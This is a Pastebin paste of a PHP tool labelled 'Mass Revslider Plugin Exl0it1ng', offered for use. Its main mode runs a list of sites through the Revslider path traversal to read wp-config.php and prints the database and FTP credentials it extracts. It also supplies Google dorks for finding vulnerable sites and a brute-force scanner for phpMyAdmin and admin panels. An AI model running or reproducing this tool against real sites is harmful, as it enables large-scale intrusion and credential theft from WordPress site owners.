Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- echo"
- <body bgcolor='#000000' text='white'>
- <title>Mass Revslider Exl0it1ng</title>
- <style>
- body,table{background: black; }
- A:link {text-decoration: none;color: red;}
- A:active {text-decoration: none;color: red;}
- A:visited {text-decoration: none;color: red;}
- A:hover {text-decoration: underline; color: red;}
- #new,input,textarea,table,td,tr,#gg
- {
- border-style:solid;
- text-decoration:bold;
- }
- input:hover,tr:hover,td:hover,textarea:hover
- {
- background-color: #FFFFCC;
- color:green;
- size:10px;
- }
- </style>
- <center><img src='https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSjfAs7Cqc8Gq6GTxefRk9Tt0gcWFS2B1kIgYFBs8H24UuC3UYMoA' height='150' width='150'></img><br>
- <!--- Menu -----!--->
- <p align='center' dir='ltr'>
- <font face='Verdana' size='2' color='#FFFFFF'>#
- <a href='?dz=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~
- <a href='?dz=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
- <font face='Verdana' size='2' color='#006699'>
- <a href='?dz=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
- <font face='Verdana' size='2' color='#006699'>
- <a href='?dz=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>
- <font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
- <font face='Verdana' size='2' color='#006699'>
- <a href='?dz=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>
- <font face='Verdana' size='2' color='#FFFFFF'> # </font>
- <br><br>
- ";
- /////////////////////////////////
- if ($_GET['dz'] == 'exp') {
- echo"<form method='post'>
- <textarea name='sites' cols='50' rows='12'></textarea><br>
- <input type='submit' name='go' value='Exploit'>
- </form>";
- function findit($mytext,$starttag,$endtag) {
- $posLeft = stripos($mytext,$starttag)+strlen($starttag);
- $posRight = stripos($mytext,$endtag,$posLeft+1);
- return substr($mytext,$posLeft,$posRight-$posLeft);
- }
- error_reporting(0);
- set_time_limit(0);
- $ya=$_POST['go'];
- $co=$_POST['sites'];
- if($ya){
- $e=explode("\r\n",$co);
- foreach($e as $bda){
- //echo '<br>'.$bda;
- /// you can devlope the tool ///
- $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
- $dn=($bda).($linkof);
- $file=@file_get_contents($dn);
- if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
- echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
- echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
- echo "<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
- echo "<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
- echo "<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
- echo "<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
- }
- elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
- echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
- echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
- echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
- echo "<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
- echo "<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
- echo "<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
- }
- else{
- echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
- echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
- echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
- }
- }
- }
- /////////////////////////////////////
- /////////////////////////////////////
- if ($_GET['dz'] == 'dorks') {
- echo'<br><textarea cols=50 rows=12 >
- inurl:wp-content/plugins/revslider/
- inurl:revslider
- inurl:revslider_admin.php
- inurl:revslider_front.php
- inurl:plugins/revslider/
- intext:Powered by Revslider
- intitle:"Index Of/ revslider"
- intitle:"Index Of/wp-content/themes/revslider"
- intitle:"Index Of/wp-content/plugins/revslider"
- intitle:"Index Of/admin/revslider"
- intitle:"Index Of/fr/revslider"
- intitle:"Index Of/en/revslider"
- intitle:"Index Of/us/revslider"
- intitle:"Index Of/ar/revslider"
- intitle:"Index Of/es/revslider"
- intitle:"Index Of/de/revslider"
- </textarea>';
- }
- //////////////////////////////////////
- //////////////////////////////////////
- if ($_GET['dz'] == 'toip') {
- echo"
- <form method='post' ><center>
- <textarea cols='50' rows='12' name='site2ip' >www.example.com
- Please Romove http:// or https://</textarea></br><br>
- <input type='submit' name='w2ip' value='Extract' ><br>
- </center>";
- if(isset($_POST['site2ip'])){
- foreach(explode("\n",$_POST['site2ip']) as $site4ip){
- $ipp=trim($site4ip);
- echo '<font color="red" size="3"></font><font color="green" size="5"><center>
- <font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'.$ipp.'</font>
- <font color=white face=Verdana size=-2> ==> </font> <font color=Green face=Verdana size=-2>'.gethostbyname ($ipp).'</font></center></font>';
- }
- }
- }
- ////////////////////////////////////
- ////////////////////////////////////
- if ($_GET['dz'] == 'db') {
- echo'
- <form action ="" method="post">
- <font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
- <input type = "submit" value="Find" />
- </form>';
- $site = $_POST['site'];
- $list = array(
- '/phpMyAdmin/',
- '/phpmyadmin/',
- '/PMA/',
- '/pma/',
- '/admin/',
- '/dbadmin/',
- '/DB_ADMIN/',
- '/db_admin/',
- '/DBA/',
- '/SQLI/',
- '/dba/',
- '/sqli/',
- '/mysql/',
- '/myadmin/',
- '/phpmyadmin2/',
- '/phpMyAdmin2/',
- '/phpMyAdmin-2/',
- '/php-my-admin/',
- '/phpMyAdmin-2.2.3/',
- '/phpMyAdmin-2.2.6/',
- '/phpMyAdmin-2.5.1/',
- '/phpMyAdmin-2.5.4/',
- '/phpMyAdmin-2.5.5-rc1/',
- '/phpMyAdmin-2.5.5-rc2/',
- '/phpMyAdmin-2.5.5/',
- '/phpMyAdmin-2.5.5-pl1/',
- '/phpMyAdmin-2.5.6-rc1/',
- '/phpMyAdmin-2.5.6-rc2/',
- '/phpMyAdmin-2.5.6/',
- '/phpMyAdmin-2.5.7/',
- '/phpMyAdmin-2.5.7-pl1/',
- '/phpMyAdmin-2.6.0-alpha/',
- '/phpMyAdmin-2.6.0-alpha2/',
- '/phpMyAdmin-2.6.0-beta1/',
- '/phpMyAdmin-2.6.0-beta2/',
- '/phpMyAdmin-2.6.0-rc1/',
- '/phpMyAdmin-2.6.0-rc2/',
- '/phpMyAdmin-2.6.0-rc3/',
- '/phpMyAdmin-2.6.0/',
- '/phpMyAdmin-2.6.0-pl1/',
- '/phpMyAdmin-2.6.0-pl2/',
- '/phpMyAdmin-2.6.0-pl3/',
- '/phpMyAdmin-2.6.1-rc1/',
- '/phpMyAdmin-2.6.1-rc2/',
- '/phpMyAdmin-2.6.1/',
- '/phpMyAdmin-2.6.1-pl1/',
- '/phpMyAdmin-2.6.1-pl2/',
- '/phpMyAdmin-2.6.1-pl3/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2-beta1/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2/',
- '/phpMyAdmin-2.6.2-pl1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-rc1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-pl1/',
- '/phpMyAdmin-2.6.4-rc1/',
- '/phpMyAdmin-2.6.4-pl1/',
- '/phpMyAdmin-2.6.4-pl2/',
- '/phpMyAdmin-2.6.4-pl3/',
- '/phpMyAdmin-2.6.4-pl4/',
- '/phpMyAdmin-2.6.4/',
- '/phpMyAdmin-2.7.0-beta1/',
- '/phpMyAdmin-2.7.0-rc1/',
- '/phpMyAdmin-2.7.0-pl1/',
- '/phpMyAdmin-2.7.0-pl2/',
- '/phpMyAdmin-2.7.0/',
- '/phpMyAdmin-2.8.0-beta1/',
- '/phpMyAdmin-2.8.0-rc1/',
- '/phpMyAdmin-2.8.0-rc2/',
- '/phpMyAdmin-2.8.0/',
- '/phpMyAdmin-2.8.0.1/',
- '/phpMyAdmin-2.8.0.2/',
- '/phpMyAdmin-2.8.0.3/',
- '/phpMyAdmin-2.8.0.4/',
- '/phpMyAdmin-2.8.1-rc1/',
- '/phpMyAdmin-2.8.1/',
- '/phpMyAdmin-2.8.2/',
- '/sqlmanager/',
- '/mysqlmanager/',
- '/p/m/a/',
- '/PMA2005/',
- '/pma2005/',
- '/dev/',
- '/phpmanager/',
- '/php-myadmin/',
- '/phpmy-admin/',
- '/webadmin/',
- '/sqlweb/',
- '/websql/',
- '/webdb/',
- '/mysqladmin/',
- '/mysql-admin/',
- '/mya/',
- '/PhpMyAdmin/',
- '/phpmyadmin/',
- '/myadmin/',
- '/mysql/',
- '/sql/',
- '/server/',
- '/db/',
- '/database/',
- '/databases/',
- '/adm/',
- '/configuration/',
- '/configure/',
- '/administrator/',
- '/login/',
- '/moderator/',
- '/controlpanel/',
- '/adminpanel/',
- '/admincontrol/',
- '/fileadmin/',
- '/data/',
- '/postgresql/',
- '/oracle/',
- '/msssql/',
- '/msaccess/',
- '/sysadmin/',
- '/serverdata/',
- '/webadmin/',
- '/admins/',
- '/Database_Administration/',
- '/WebAdmin/',
- '/useradmin/',
- '/sysadmins/',
- '/admin1/',
- '/system-administration/',
- '/administrators/',
- '/pgadmin/',
- '/directadmin/',
- '/staradmin/',
- '/ServerAdministrator/',
- '/SysAdmin/',
- '/administer/',
- '/LiveUser_Admin/',
- '/sys-admin/',
- '/typo3/',
- '/panel/',
- '/xlogin/',
- '/smblogin/',
- '/phpldapadmin/',
- '/server_admin/',
- '/database_administration/',
- '/system_administration/',
- '/ss_vms_admin_sm/',
- '/adminarea/',
- '/MySQL/',
- '/mysql_admin/',
- '/server_data/',
- '/DB/',
- '/DB1/',
- '/DB2/',
- '/DB3/',
- '/DB4/',
- '/DB5/',
- '/DB6/',
- '/DB7/',
- '/DB8/',
- '/DB9/',
- '/DB0/',
- '/db1/',
- '/db2/',
- '/db3/',
- '/db4/',
- '/db5/',
- '/db6/',
- '/db7/',
- '/db8/',
- '/db9/',
- '/db0/',
- '/mysql5/',
- '/mysql4/',
- '/root/',
- '/apache/',
- '/php/',
- '/Apache/',
- '/Php/',
- '/apach/',
- '/apachepanel/',
- '/WEBSERVERS/',
- '/DATABASE1/',
- '/DATABASE2/',
- '/DATABASE3/',
- '/DATABASE4/',
- '/DATABASE5/',
- '/DATABASE6/',
- '/DATABASE7/',
- '/DATABASE8/',
- '/DATABASE9/',
- '/WEBDATA/',
- '/WEB_DATA/',
- '/webservers/',
- '/database1/',
- '/database2/',
- '/database3/',
- '/database4/',
- '/database5/',
- '/database6/',
- '/database7/',
- '/database8/',
- '/database9/',
- '/webdata/',
- '/web_data/',
- );
- if(isset($site)){
- foreach($list as $path => $test) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- //print $url;
- if (preg_match("/200 OK/", $result)){
- echo "<br /><b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
- }
- else if (preg_match("/401 Unauthorized/", $result)) {
- echo "<br /><b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
- echo "<br /><b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
- }
- }
- echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
- }
- }
- ////////////////////////////////////
- if ($_GET['dz'] == 'scan') {
- echo "<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://dz-amir@hotmail.com >dz-amir@hotmail.com </a> ....</font></u></b>";
- }
- ?>
- <center>
- <code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
- <font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By AMir dZ 52</font></code>
- </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
